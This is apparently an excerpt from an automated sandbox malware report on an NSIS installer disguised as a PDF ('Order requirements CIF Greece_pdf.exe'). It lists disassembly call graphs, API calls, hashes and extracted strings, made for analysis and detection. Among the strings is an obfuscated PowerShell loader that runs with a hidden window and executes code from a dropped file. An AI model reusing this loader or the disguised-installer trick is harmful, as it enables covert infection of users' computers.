                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D49
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403DF7
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403E01
                                                                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1B
                                                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6C
                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403F12
                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403F33
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F45
                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403F60
                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F76
                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403F7D
                                                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F95
                                                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FA8
                                                                                                                                        • lstrlenA.KERNEL32(0079F568,?,0079F568,00000000), ref: 00403FD2
                                                                                                                                        • SetWindowTextA.USER32(?,0079F568), ref: 00403FE1
                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404115
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                        • Opcode ID: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
                                                                                                                                        • Instruction ID: 3358382e01a0dfa2f7aaf81ce727bcb664174c2c7b1baf79b3eefcfdc57a0ccd
                                                                                                                                        • Opcode Fuzzy Hash: ec739e9d96bc32f6baab2395f713d9bda4e2b377654e9d8e1af96a71d6295b9f
                                                                                                                                        • Instruction Fuzzy Hash: 6EC1D171500200AFDB21AF25EE89D2B3AB9EB96706F00453EF641B51F1CB3D9992DB1D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 288 4038e7-4038ff call 4064dd 291 403901-403911 call 406032 288->291 292 403913-403944 call 405fbb 288->292 301 403967-403990 call 403bac call 405b5a 291->301 297 403946-403957 call 405fbb 292->297 298 40395c-403962 lstrcatA 292->298 297->298 298->301 306 403996-40399b 301->306 307 403a17-403a1f call 405b5a 301->307 306->307 308 40399d-4039c1 call 405fbb 306->308 313 403a21-403a28 call 406167 307->313 314 403a2d-403a52 LoadImageA 307->314 308->307 315 4039c3-4039c5 308->315 313->314 317 403ad3-403adb call 40140b 314->317 318 403a54-403a84 RegisterClassA 314->318 319 4039d6-4039e2 lstrlenA 315->319 320 4039c7-4039d4 call 405a97 315->320 332 403ae5-403af0 call 403bac 317->332 333 403add-403ae0 317->333 321 403ba2 318->321 322 403a8a-403ace SystemParametersInfoA CreateWindowExA 318->322 326 4039e4-4039f2 lstrcmpiA 319->326 327 403a0a-403a12 call 405a6c call 4060d4 319->327 320->319 325 403ba4-403bab 321->325 322->317 326->327 331 4039f4-4039fe GetFileAttributesA 326->331 327->307 336 403a00-403a02 331->336 337 403a04-403a05 call 405ab3 331->337 341 403af6-403b10 ShowWindow call 40646f 332->341 342 403b79-403b7a call 4052cd 332->342 333->325 336->327 336->337 337->327 349 403b12-403b17 call 40646f 341->349 350 403b1c-403b2e GetClassInfoA 341->350 345 403b7f-403b81 342->345 347 403b83-403b89 345->347 348 403b9b-403b9d call 40140b 345->348 347->333 351 403b8f-403b96 call 40140b 347->351 348->321 349->350 354 403b30-403b40 GetClassInfoA RegisterClassA 350->354 355 403b46-403b69 DialogBoxParamA call 40140b 350->355 351->333 354->355 359 403b6e-403b77 call 403837 355->359 359->325
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                                                          • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                                                        • lstrcatA.KERNEL32(1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",00000000), ref: 00403962
                                                                                                                                        • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,74DF3410), ref: 004039D7
                                                                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
                                                                                                                                        • GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
                                                                                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E
                                                                                                                                          • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                                                                                                        • RegisterClassA.USER32(007A2700), ref: 00403A7B
                                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A93
                                                                                                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AC8
                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403AFE
                                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,007A2700), ref: 00403B2A
                                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,007A2700), ref: 00403B37
                                                                                                                                        • RegisterClassA.USER32(007A2700), ref: 00403B40
                                                                                                                                        • DialogBoxParamA.USER32(?,00000000,00403C84,00000000), ref: 00403B5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                        • String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                        • API String ID: 1975747703-855357793
                                                                                                                                        • Opcode ID: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
                                                                                                                                        • Instruction ID: f7990f1d18b0f5a23d57c8cfe7c70d4d4c73fa70df7bf6ac8ad2bf3217d0cd4d
                                                                                                                                        • Opcode Fuzzy Hash: 33a654ab319a5143a78b8400df8df2a17f9037dc0bafbe0e038c6009d0731ac5
                                                                                                                                        • Instruction Fuzzy Hash: 29619570640640AEE610AF659D45F3B3E6CEB8574AF10413EF981B62E3DB7D9D028B2D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 362 402ea1-402eef GetTickCount GetModuleFileNameA call 405c6d 365 402ef1-402ef6 362->365 366 402efb-402f29 call 4060d4 call 405ab3 call 4060d4 GetFileSize 362->366 367 4030d1-4030d5 365->367 374 403014-403022 call 402e3d 366->374 375 402f2f 366->375 381 403024-403027 374->381 382 403077-40307c 374->382 377 402f34-402f4b 375->377 379 402f4d 377->379 380 402f4f-402f58 call 4032c7 377->380 379->380 387 40307e-403086 call 402e3d 380->387 388 402f5e-402f65 380->388 384 403029-403041 call 4032dd call 4032c7 381->384 385 40304b-403075 GlobalAlloc call 4032dd call 4030d8 381->385 382->367 384->382 409 403043-403049 384->409 385->382 413 403088-403099 385->413 387->382 391 402fe1-402fe5 388->391 392 402f67-402f7b call 405c28 388->392 399 402fe7-402fee call 402e3d 391->399 400 402fef-402ff5 391->400 392->400 411 402f7d-402f84 392->411 399->400 402 403004-40300c 400->402 403 402ff7-403001 call 406594 400->403 402->377 412 403012 402->412 403->402 409->382 409->385 411->400 415 402f86-402f8d 411->415 412->374 416 4030a1-4030a6 413->416 417 40309b 413->417 415->400 418 402f8f-402f96 415->418 419 4030a7-4030ad 416->419 417->416 418->400 420 402f98-402f9f 418->420 419->419 421 4030af-4030ca SetFilePointer call 405c28 419->421 420->400 422 402fa1-402fc1 420->422 424 4030cf 421->424 422->382 425 402fc7-402fcb 422->425 424->367 426 402fd3-402fdb 425->426 427 402fcd-402fd1 425->427 426->400 428 402fdd-402fdf 426->428 427->412 427->426 428->400
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00402EB2
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,00000400), ref: 00402ECE
                                                                                                                                          • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405C71
                                                                                                                                          • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00402F1A
                                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                                                                                                                        • "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 00402EA1
                                                                                                                                        • C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                                                                                                                        • Error launching installer, xrefs: 00402EF1
                                                                                                                                        • soft, xrefs: 00402F8F
                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                                                                                                        • Null, xrefs: 00402F98
                                                                                                                                        • Inst, xrefs: 00402F86
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                        • String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                        • API String ID: 2803837635-2641653404
                                                                                                                                        • Opcode ID: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
                                                                                                                                        • Instruction ID: e6d4fb369877e8ee952de7074d12315c12307524423d8dbd5c49f4dc18488fa3
                                                                                                                                        • Opcode Fuzzy Hash: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
                                                                                                                                        • Instruction Fuzzy Hash: 3151D271901208AFDF20AF65DD85B6E7AB8EB04755F10813BF500B22D6D77C9E818B9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 429 406167-406172 430 406174-406183 429->430 431 406185-40619b 429->431 430->431 432 4061a1-4061ac 431->432 433 40638c-406390 431->433 432->433 436 4061b2-4061b9 432->436 434 406396-4063a0 433->434 435 4061be-4061c8 433->435 438 4063a2-4063a6 call 4060d4 434->438 439 4063ab-4063ac 434->439 435->434 437 4061ce-4061d5 435->437 436->433 440 4061db-40620f 437->440 441 40637f 437->441 438->439 443 406215-40621f 440->443 444 40632c-40632f 440->444 445 406381-406387 441->445 446 406389-40638b 441->446 447 406221-406225 443->447 448 406239 443->448 449 406331-406334 444->449 450 40635f-406362 444->450 445->433 446->433 447->448 451 406227-40622b 447->451 454 406240-406247 448->454 452 406344-406350 call 4060d4 449->452 453 406336-406342 call 406032 449->453 455 406370-40637d lstrlenA 450->455 456 406364-40636b call 406167 450->456 451->448 458 40622d-406231 451->458 467 406355-40635b 452->467 453->467 460 406249-40624b 454->460 461 40624c-40624e 454->461 455->433 456->455 458->448 463 406233-406237 458->463 460->461 465 406250-40626b call 405fbb 461->465 466 406287-40628a 461->466 463->454 475 406270-406273 465->475 468 40629a-40629d 466->468 469 40628c-406298 GetSystemDirectoryA 466->469 467->455 471 40635d 467->471 473 40630a-40630c 468->473 474 40629f-4062ad GetWindowsDirectoryA 468->474 472 40630e-406311 469->472 476 406324-40632a call 4063af 471->476 472->476 477 406313-406317 472->477 473->472 479 4062af-4062b9 473->479 474->473 475->477 480 406279-406282 call 406167 475->480 476->455 477->476 482 406319-40631f lstrcatA 477->482 484 4062d3-4062e9 SHGetSpecialFolderLocation 479->484 485 4062bb-4062be 479->485 480->472 482->476 488 406307 484->488 489 4062eb-406305 SHGetPathFromIDListA CoTaskMemFree 484->489 485->484 487 4062c0-4062c7 485->487 490 4062cf-4062d1 487->490 488->473 489->472 489->488 490->472 490->484
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00406292
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062A5
                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00405233,74DF23A0,?,subterritories,00000000,00405233,subterritories,00000000), ref: 004062E1
                                                                                                                                        • SHGetPathFromIDListA.SHELL32(74DF23A0,: Completed), ref: 004062EF
                                                                                                                                        • CoTaskMemFree.OLE32(74DF23A0), ref: 004062FB
                                                                                                                                        • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631F
                                                                                                                                        • lstrlenA.KERNEL32(: Completed,?,subterritories,00000000,00405233,subterritories,00000000,00000000,00799A22,74DF23A0), ref: 00406371
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                        • String ID: Clona $$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$subterritories
                                                                                                                                        • API String ID: 717251189-3719949256
                                                                                                                                        • Opcode ID: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
                                                                                                                                        • Instruction ID: 6e1ed981659f24e818377f3a16580b7a42bd992c39e8c3c65ac9697aa82fb6a7
                                                                                                                                        • Opcode Fuzzy Hash: e6c4a9fbb4c321ecebe7d36b76985c5b159c9a2176219b4b87ef98d85bb8a455
                                                                                                                                        • Instruction Fuzzy Hash: C861E571900210AEEB149F28DC94BBE7BA49B46314F12413FED43B62D1D73C4961CB9E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 491 401759-40177c call 402bce call 405ad9 496 401786-401798 call 4060d4 call 405a6c lstrcatA 491->496 497 40177e-401784 call 4060d4 491->497 503 40179d-4017a3 call 4063af 496->503 497->503 507 4017a8-4017ac 503->507 508 4017ae-4017b8 call 406448 507->508 509 4017df-4017e2 507->509 517 4017ca-4017dc 508->517 518 4017ba-4017c8 CompareFileTime 508->518 511 4017e4-4017e5 call 405c48 509->511 512 4017ea-401806 call 405c6d 509->512 511->512 519 401808-40180b 512->519 520 40187e-4018a7 call 4051fb call 4030d8 512->520 517->509 518->517 521 401860-40186a call 4051fb 519->521 522 40180d-40184f call 4060d4 * 2 call 406167 call 4060d4 call 4057f0 519->522 534 4018a9-4018ad 520->534 535 4018af-4018bb SetFileTime 520->535 532 401873-401879 521->532 522->507 555 401855-401856 522->555 536 402a63 532->536 534->535 538 4018c1-4018cc CloseHandle 534->538 535->538 540 402a65-402a69 536->540 541 4018d2-4018d5 538->541 542 402a5a-402a5d 538->542 544 4018d7-4018e8 call 406167 lstrcatA 541->544 545 4018ea-4018ed call 406167 541->545 542->536 550 4018f2-40238c call 4057f0 544->550 545->550 550->540 550->542 555->532 557 401858-401859 555->557 557->521
                                                                                                                                        APIs
                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111,00000000,00000000,00000031), ref: 00401798
                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",00000000,00000000,powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                          • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
                                                                                                                                          • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                                                          • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                                                          • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
                                                                                                                                          • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                                                          • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                        • String ID: Clona $$C:\Users\Public\Pictures\shopkeeping\legio.Per$C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111$hattepuldes\Stethospasm84\$powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
                                                                                                                                        • API String ID: 1941528284-3744323996
                                                                                                                                        • Opcode ID: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
                                                                                                                                        • Instruction ID: fd3b8c6ffda923ee712ccabd95e062e364f7e6d0f101aa5c62542bd457b9e8d3
                                                                                                                                        • Opcode Fuzzy Hash: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
                                                                                                                                        • Instruction Fuzzy Hash: F841B571900114BACF10BFB5CC45DAF36A9EF45368B20833BF522B50E2CA7C8A519B6D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
